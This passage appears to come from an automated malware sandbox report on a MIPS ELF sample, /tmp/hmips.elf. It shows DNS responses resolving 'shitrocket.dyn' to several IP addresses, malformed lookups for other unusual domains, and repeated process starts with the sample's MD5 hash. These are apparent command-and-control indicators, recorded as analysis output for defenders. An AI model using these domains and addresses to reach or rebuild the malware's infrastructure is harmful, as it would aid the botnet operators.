                          Dec 21, 2024 04:28:00.633162022 CET81.169.136.222192.168.2.230xfbf6No error (0)shitrocket.dyn80.78.26.121A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:00.633162022 CET81.169.136.222192.168.2.230xfbf6No error (0)shitrocket.dyn212.64.215.71A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:00.633162022 CET81.169.136.222192.168.2.230xfbf6No error (0)shitrocket.dyn212.192.13.95A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:00.633162022 CET81.169.136.222192.168.2.230xfbf6No error (0)shitrocket.dyn185.72.8.231A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.443694115 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn212.60.5.153A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.443694115 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn185.72.8.231A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.443694115 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn212.64.215.71A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.443694115 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn176.32.32.113A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.443694115 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn212.192.13.95A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.443694115 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn86.107.100.19A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.443694115 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn80.78.26.121A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.507653952 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn212.64.215.71A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.507653952 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn80.78.26.121A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.507653952 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn212.60.5.153A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.507653952 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn185.72.8.231A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.507653952 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn86.107.100.19A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.507653952 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn176.32.32.113A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:02.507653952 CET168.235.111.72192.168.2.230x65bcNo error (0)shitrocket.dyn212.192.13.95A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:07.925062895 CET81.169.136.222192.168.2.230xb2a0No error (0)shitrocket.dyn80.78.26.121A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:07.925062895 CET81.169.136.222192.168.2.230xb2a0No error (0)shitrocket.dyn185.72.8.231A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:07.925062895 CET81.169.136.222192.168.2.230xb2a0No error (0)shitrocket.dyn86.107.100.19A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:07.925062895 CET81.169.136.222192.168.2.230xb2a0No error (0)shitrocket.dyn212.64.215.71A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:07.925062895 CET81.169.136.222192.168.2.230xb2a0No error (0)shitrocket.dyn212.192.13.95A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:07.925062895 CET81.169.136.222192.168.2.230xb2a0No error (0)shitrocket.dyn176.32.32.113A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:07.925062895 CET81.169.136.222192.168.2.230xb2a0No error (0)shitrocket.dyn212.60.5.153A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:10.491585016 CET109.91.184.21192.168.2.230xd70No error (0)shitrocket.dyn176.32.32.113A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:10.491585016 CET109.91.184.21192.168.2.230xd70No error (0)shitrocket.dyn80.78.26.121A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:10.491585016 CET109.91.184.21192.168.2.230xd70No error (0)shitrocket.dyn212.64.215.71A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:10.491585016 CET109.91.184.21192.168.2.230xd70No error (0)shitrocket.dyn212.192.13.95A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:10.491585016 CET109.91.184.21192.168.2.230xd70No error (0)shitrocket.dyn86.107.100.19A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:10.491585016 CET109.91.184.21192.168.2.230xd70No error (0)shitrocket.dyn185.72.8.231A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:10.491585016 CET109.91.184.21192.168.2.230xd70No error (0)shitrocket.dyn212.60.5.153A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:12.846244097 CET194.36.144.87192.168.2.230x5232Format error (1)hikvision.geek. [malformed]nonenone256460false
                          Dec 21, 2024 04:28:13.094410896 CET152.53.15.127192.168.2.230x405aFormat error (1)catvision.dyn. [malformed]nonenone256461false
                          Dec 21, 2024 04:28:13.335596085 CET51.158.108.203192.168.2.230xfee0Format error (1)catlovingfools.geek. [malformed]nonenone256461false
                          Dec 21, 2024 04:28:21.244559050 CET109.91.184.21192.168.2.230xd70Format error (1)catvision.dyn. [malformed]nonenone256469false
                          Dec 21, 2024 04:28:37.745575905 CET81.169.136.222192.168.2.230xc7f7No error (0)shitrocket.dyn176.32.32.113A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:37.745575905 CET81.169.136.222192.168.2.230xc7f7No error (0)shitrocket.dyn185.72.8.231A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:37.745575905 CET81.169.136.222192.168.2.230xc7f7No error (0)shitrocket.dyn212.192.13.95A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:37.745575905 CET81.169.136.222192.168.2.230xc7f7No error (0)shitrocket.dyn86.107.100.19A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:37.745575905 CET81.169.136.222192.168.2.230xc7f7No error (0)shitrocket.dyn80.78.26.121A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:37.745575905 CET81.169.136.222192.168.2.230xc7f7No error (0)shitrocket.dyn212.64.215.71A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:37.745575905 CET81.169.136.222192.168.2.230xc7f7No error (0)shitrocket.dyn212.60.5.153A (IP address)IN (0x0001)false
                          Dec 21, 2024 04:28:41.340818882 CET51.158.108.203192.168.2.230xcee8Format error (1)hikvision.geek. [malformed]nonenone256489false
                          Dec 21, 2024 04:28:41.587431908 CET194.36.144.87192.168.2.230xfa80Format error (1)catlovingfools.geek. [malformed]nonenone256489false

                          System Behavior

                          Start time (UTC):03:26:54
                          Start date (UTC):21/12/2024
                          Path:/tmp/hmips.elf
                          Arguments:/tmp/hmips.elf
                          File size:5777432 bytes
                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                          Start time (UTC):03:26:54
                          Start date (UTC):21/12/2024
                          Path:/tmp/hmips.elf
                          Arguments:-
                          File size:5777432 bytes
                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                          Start time (UTC):03:26:55
                          Start date (UTC):21/12/2024
                          Path:/tmp/hmips.elf
                          Arguments:-
                          File size:5777432 bytes
                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                          Start time (UTC):03:26:55
                          Start date (UTC):21/12/2024
                          Path:/tmp/hmips.elf
                          Arguments:-
                          File size:5777432 bytes
                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                          Start time (UTC):03:26:55
                          Start date (UTC):21/12/2024
                          Path:/tmp/hmips.elf
                          Arguments:-
                          File size:5777432 bytes
                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                          Start time (UTC):03:26:54
                          Start date (UTC):21/12/2024
                          Path:/tmp/hmips.elf
                          Arguments:-
                          File size:5777432 bytes
                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                          Start time (UTC):03:26:54
                          Start date (UTC):21/12/2024
                          Path:/tmp/hmips.elf
                          Arguments:-
                          File size:5777432 bytes
                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                          Start time (UTC):03:26:54
                          Start date (UTC):21/12/2024
                          Path:/tmp/hmips.elf
                          Arguments:-
                          File size:5777432 bytes
                          MD5 hash:0083f1f0e77be34ad27f849842bbb00c